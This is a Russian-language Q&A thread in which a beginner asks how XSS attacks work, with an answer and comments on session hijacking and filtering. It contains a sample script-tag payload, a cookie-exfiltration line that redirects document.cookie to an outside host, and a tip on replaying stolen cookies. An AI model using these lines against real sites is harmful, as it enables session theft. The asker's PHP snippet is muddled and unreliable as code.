# Как работают XSS-атаки?

Tags: xss, php, javascript

Что-то я совсем не понимаю как работают XSS-атаки. Нашел как можно защитится от них:

- [`mysql_real_escape_string`](http://php.net/manual/ru/function.mysql-real-escape-string.php) или [`PDO`](http://php.net/manual/ru/class.pdo.php), если идут запросы к БД.
- [`htmlspecialchars`](http://php.net/manual/ru/function.htmlspecialchars.php), а ещё лучше [`htmlentites`](http://php.net/manual/ru/function.htmlentities.php).
- [`stript_tags`](http://php.net/manual/ru/function.strip-tags.php), а ещё лучше HTML Purifier, либо регулярки.

Читал что можно получить доступ к document.cookies,логину и паролю при авторизации,можно создать нового пользователя в БД,провести запросы к БД, которые выводят секретную информацию.

Но как все это осуществляется непонятно, за исключением части с БД.

Ну, пример атаки:

```
<script>alert("cookie: "+document.cookie)</script>
```

Вроде код должен вывести куки пользователя. Как переправляется на сайт вломщика? Предположение:

```
window.location,href='http://mysite.com?cookie='+ document.cookie
```

Так?

Очень часто на форумах попадаются темы "Как передать переменную PHP в js". Это что они хотели провести XSS-атаку?

Я могу сделать атаку вида:

```
<script>
    var session='<?php json_decode($_SESSION) ?>'
</script>
```

То есть, взять и посмотреть, какая у них там сессия работает?

Comment: Язык вопроса ужасающий. Слегка подкорректировал, но, по уму, его б с нуля переписать.

Answer (score 4):

Вот тут есть хорошая статья на эту тему: [XSS глазами злоумышленника](http://habrahabr.ru/post/66057/)

А в целом xss никак не может получить данные напрямую с сервера. Для того что бы украсть сессию пользователя нужно украсть его cookie и подменить ими свои, что бы сервер думал что Вы - это тот пользователь, куки которого Вы украли. Это возможно из-за того что сервер проверяет сессию по кукам, которые он записывает в браузере клиента и которые, теоретически, не может получить никто кроме сайта, который их записал.

Но вообще это один из видов XSS, есть еще вариант фишинга с помощью XSS (подмена настоящего сайта своей копией, что бы украсть пароль и логин пользователя)

Самая лучшая защита от XSS это фильтрация всего что пользователь отправляет на сервер. Это не позволит злоумышленнику оставить у вас на сайте вредоносный код.

Comment: Доволен ответом.Но практически примером можете помочь?Я себе не представляю как "...его cookie и подменить ими свои".

Comment: > Но практически примером можете помочь?

ссылку на хабр же дали, влом прочесть статью?

Comment: Palmervan обожаю умников...Ты изначально смотрел мой вопрос и код ,который я написал?На хабре только голая теория..

Comment: @koza4ok ненавижу ленивых... [habrasearch][1] и [место][2] где тебе точно помогут


  [1]: http://habrahabr.ru/search/?q=xss
  [2]: http://forum.antichat.ru/

Comment: Я на практике куки не подменял, но мне кажется что будет достаточно в консоле добавить куку от имени сайта. Что то типа: document.cookie = 'cookie_from_sacrifice'